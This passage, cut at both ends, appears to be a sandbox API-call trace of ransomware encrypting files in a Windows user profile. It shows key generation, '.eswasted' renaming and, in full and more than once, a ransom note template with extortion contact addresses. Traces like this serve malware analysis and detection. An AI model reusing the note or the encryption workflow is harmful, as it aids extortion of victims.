hFile=0x120, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x85 [0083.017] MapViewOfFile (hFileMappingObject=0xf8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x85) returned 0x2d0000 [0083.017] CloseHandle (hObject=0x120) returned 1 [0083.019] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0083.020] CloseHandle (hObject=0xf8) returned 1 [0083.020] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4de250 [0083.020] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0083.021] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4de298 | out: pbBuffer=0x4de298) returned 1 [0083.021] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.021] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0083.021] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0083.021] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.073] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4eaa28 [0083.073] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4de250 | out: hHeap=0x4a0000) returned 1 [0083.073] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0083.073] _snwprintf (in: _Dest=0x4dd498, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]HVM+/TqhkHYm7vu8qjUoVtbL1/zxgVZdJ093yfmZ6B+mbOTnL/BpDjGvgGl83WGs\r\nzvMFD8O26ExSNyLpqlklMW9k4fUqSWj0QTmgOAf8gZuxFxQJM2rL/yDSIt1Y807T\r\n3Xve+jGX2mYRnoZ2nvLAMNd6FUcsXIFjHbIjdmGx6YjljGCPcJuZ6onZQ4hFw4zN\r\ncirjo1Ug13b0SD6xgQBrKMecnNTciZqdjiONP7X4GomlCW+Sl5FMUA/jZXMdtTeG\r\nXyxqgnASq/7AXgCfSciEJb3DqqW8dATpp70xZ2rXze7cUaX8UHul5MqI7+6nFo3s\r\n8B2PNpKBysWxARMC5O1fARVjlSRme124yJNqVVYhKzmR3v5aQyOsc+zODEMKFhDZ\r\n226P2kkaE7Hrf510PXnOklHEpA3KmUDI47IC296uRWRW+KDPMPSwJLXz/Ecx4guW\r\nLYosGHljCQGqo2dbORsyS70C53a53v/lBxmCdxiDZAm9FFeUf2RqokyoTlY0HKuf\r\n5LWP3gylWsLDOKX9bA9M715szuhQzzM61Tiv41lGmdbKcpmNa5+UvCD5Cfs7CSAS\r\nHvsTI0uAT9lLD65MInlwiQTf4YGfKBVvnNYcELJrMsFPviBhNWuDmritSePIcrb1\r\nVzpEzpJAJDZs3jAacXZpKnEJVK2Yq3U8QrvyFVOdw3m=[end_key]\r\nKEEP IT\r\n") returned 990 [0083.074] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4eaa28 | out: hHeap=0x4a0000) returned 1 [0083.074] WriteFile (in: hFile=0x118, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x121fef8, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fef8*=0x7bc, lpOverlapped=0x0) returned 1 [0083.074] SetEndOfFile (hFile=0x118) returned 1 [0083.076] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0083.076] CloseHandle (hObject=0x118) returned 1 [0083.078] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0083.078] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x500688 | out: hHeap=0x4a0000) returned 1 [0083.078] _aulldvrm () returned 0x0 [0083.078] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0083.079] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0083.079] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.079] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url") returned 69 [0083.079] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x294) returned 0x4de6f8 [0083.079] lstrcpyW (in: lpString1=0x4de782, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0083.079] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0083.079] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0083.080] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0083.080] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.080] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url.eswasted_info" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft store.url.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0083.080] WriteFile (in: hFile=0x118, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0083.081] SetEndOfFile (hFile=0x118) returned 1 [0083.081] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.081] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0083.082] lstrcpyW (in: lpString1=0x4de782, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0083.082] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft store.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url.eswasted" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft store.url.eswasted")) returned 1 [0083.125] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url.eswasted" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft store.url.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0083.125] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0083.125] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x86 [0083.125] MapViewOfFile (hFileMappingObject=0xfc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x86) returned 0x2d0000 [0083.125] CloseHandle (hObject=0x110) returned 1 [0083.127] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0083.127] CloseHandle (hObject=0xfc) returned 1 [0083.127] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4ddfd8 [0083.127] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0083.128] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4de020 | out: pbBuffer=0x4de020) returned 1 [0083.128] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.128] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0083.128] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0083.129] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.137] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4de1e0 [0083.137] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ddfd8 | out: hHeap=0x4a0000) returned 1 [0083.137] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0083.137] _snwprintf (in: _Dest=0x4dd498, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]M75sdZ2LvZ0YiTax0OzqeHXuERW8+UftmzQi2T2nubUqOAmcVpN9t0duNGb/1WKH\r\n0GgdlfSOfe8o/UTIq+NMIwumHc0w00Bc2AnY3spGobonJSjtrWZi7/QmG7gApCSp\r\nLpdyo4P4gWcHdAZEm4ejNu3WT9AWBFnchQCJh142IvM2U53gUjW694vVRHzeoodQ\r\nuVUZ0xDI56Ahz+0HtMkXOX/QWxyNjjsCIcgnZpPesCbnArvCrZIPq71KW9mljv+G\r\nr0Po7IiTZdFPSYauVXElKDoHwmgvsjQ0jeOXSq8ZFVa73e0A6jnrd+rH5EqkKIWz\r\nu0p5NnJzCrTkyO5g1UeGnv59vLJtFDMmMwVMw7sqGVCxfMJHl05NtkUhOwvhClsy\r\nT636k7Po6yuccUWRTAYbfeOJgIhWSo/WmP+njHpMIhT1PNlrSV5IhRyEeCoLHpn+\r\n4WbNn+cfoWsAYMQa0/+jJs1F4TxfVNCifn+9tYyqeifHuEwajgaTfJCHqBVesJFU\r\njwtVRBiWPIqoGNlqXXSSAVeSEu5WfDBfyV7AMJT4SMQhvQDimUEq/NB4eR6w7iAG\r\n/Pc2ZlbHhK23ZLgg1iq04fWDY4zrPdK2RGrUCKX51SNhjLq5rKk7CKxZBey1z9bH\r\nM3xI8tD+094sPecXBeY7wCrdooJn9lmr5ZDmu4ZhFqZ=[end_key]\r\nKEEP IT\r\n") returned 990 [0083.137] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4de1e0 | out: hHeap=0x4a0000) returned 1 [0083.137] WriteFile (in: hFile=0x118, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x121fef8, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fef8*=0x7bc, lpOverlapped=0x0) returned 1 [0083.137] SetEndOfFile (hFile=0x118) returned 1 [0083.139] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0083.139] CloseHandle (hObject=0x118) returned 1 [0083.141] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4de6f8 | out: hHeap=0x4a0000) returned 1 [0083.141] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x500858 | out: hHeap=0x4a0000) returned 1 [0083.141] _aulldvrm () returned 0x0 [0083.141] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0083.142] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0083.142] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.142] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url") returned 57 [0083.142] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x27c) returned 0x4ddfd8 [0083.142] lstrcpyW (in: lpString1=0x4de04a, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0083.142] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0083.142] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0083.143] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0083.143] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.143] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url.eswasted_info" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn money.url.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0083.143] WriteFile (in: hFile=0x118, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0083.145] SetEndOfFile (hFile=0x118) returned 1 [0083.145] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.145] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0083.145] lstrcpyW (in: lpString1=0x4de04a, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0083.145] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn money.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url.eswasted" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn money.url.eswasted")) returned 1 [0083.146] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url.eswasted" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn money.url.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0083.146] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0083.146] GetFileSize (in: hFile=0xfc, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x85 [0083.146] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x85) returned 0x2d0000 [0083.146] CloseHandle (hObject=0xfc) returned 1 [0083.147] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0083.147] CloseHandle (hObject=0x110) returned 1 [0083.147] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4de260 [0083.147] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0083.148] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4de2a8 | out: pbBuffer=0x4de2a8) returned 1 [0083.148] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.148] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0083.149] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0083.149] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.157] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4de468 [0083.157] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4de260 | out: hHeap=0x4a0000) returned 1 [0083.157] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0083.157] _snwprintf (in: _Dest=0x4dd498, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]LHYR74D7Bs+nczh9X8GJQzPCf6Qe5bKu2fPftuNAHcoLvJIp3HSH7hScN3WiGnNk\r\n61F/qtt0rai+cnUT9uBRr6mcLtgXXyob5zwVysjEYkQ0p6LFdQsm1LukTPgQ0Bo4\r\nuOZIimMnWOrpC8sSlrxVSU7ib/wDgEf8rWrNLDYmAWv755MTZV0ha3n3z9qTt7iR\r\n4eBMCD2lAyOdApcFYHfAk1Fna8NTJk9gY7F7dwCVpBnPRP3vi2ULre4T5RmrYKcH\r\nPcAYmi5kQdSg4826R7E+W7UNi7bi7C4NiI7VeGc2uPsgzc74nPMpchiVnk8NeT6l\r\nqJdCcozOp9nd+4ESZeO+g+z4r8dDtEPq6tLFS4aTaQsDuUAwxkGLXAtLKt76vTz/\r\nOy6sSXQORmq4SF/jmUj5IPIU4G7U4NDPg60qLn7nA9UcbgZ383TSuL6hpdxu76Se\r\nvuDpfxdy7odLTlMoYg3xUJpaZxm18wrZVf6YUm2kVLj8Gj2N3y1i6fCpgi8GVpfv\r\nfsh2dw3cpc3JqrgwxzIoGs+6fBTusgl4SGNPiRlm5O+cAbfxX3aZyMSP1Dmwgmxg\r\nr46QWptVLaPMEpz/q1z0IZdhirmooqfvSsDCUR/TxNx7m3KH1I+mS5tAzVZHiww1\r\nrc/ZBX+f+w4Fb4Fh+NslzOHvwWwYxGaicNi/Ln+Wo8i=[end_key]\r\nKEEP IT\r\n") returned 990 [0083.157] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4de468 | out: hHeap=0x4a0000) returned 1 [0083.157] WriteFile (in: hFile=0x118, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x121fef8, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fef8*=0x7bc, lpOverlapped=0x0) returned 1 [0083.157] SetEndOfFile (hFile=0x118) returned 1 [0083.160] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0083.222] CloseHandle (hObject=0x118) returned 1 [0083.224] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ddfd8 | out: hHeap=0x4a0000) returned 1 [0083.224] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f4aa8 | out: hHeap=0x4a0000) returned 1 [0083.224] _aulldvrm () returned 0x0 [0083.224] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0083.225] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0083.225] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.225] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url") returned 58 [0083.225] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x27e) returned 0x4ddfd8 [0083.225] lstrcpyW (in: lpString1=0x4de04c, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0083.225] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0083.225] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0083.226] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0083.226] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.226] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url.eswasted_info" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn sports.url.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0083.226] WriteFile (in: hFile=0x118, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0083.227] SetEndOfFile (hFile=0x118) returned 1 [0083.227] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.227] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0083.227] lstrcpyW (in: lpString1=0x4de04c, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0083.228] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn sports.url"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url.eswasted" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn sports.url.eswasted")) returned 1 [0083.228] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url.eswasted" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn sports.url.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0083.228] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x120 [0083.228] GetFileSize (in: hFile=0xf8, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x85 [0083.229] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x85) returned 0xb10000 [0083.229] CloseHandle (hObject=0xf8) returned 1 [0083.230] UnmapViewOfFile (lpBaseAddress=0xb10000) returned 1 [0083.230] CloseHandle (hObject=0x120) returned 1 [0083.230] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4de260 [0083.230] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0083.231] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4de2a8 | out: pbBuffer=0x4de2a8) returned 1 [0083.231] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.231] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0083.232] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0083.232] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.240] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4de468 [0083.240] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4de260 | out: hHeap=0x4a0000) returned 1 [0083.240] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0083.240] _snwprintf (in: _Dest=0x4dd498, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING 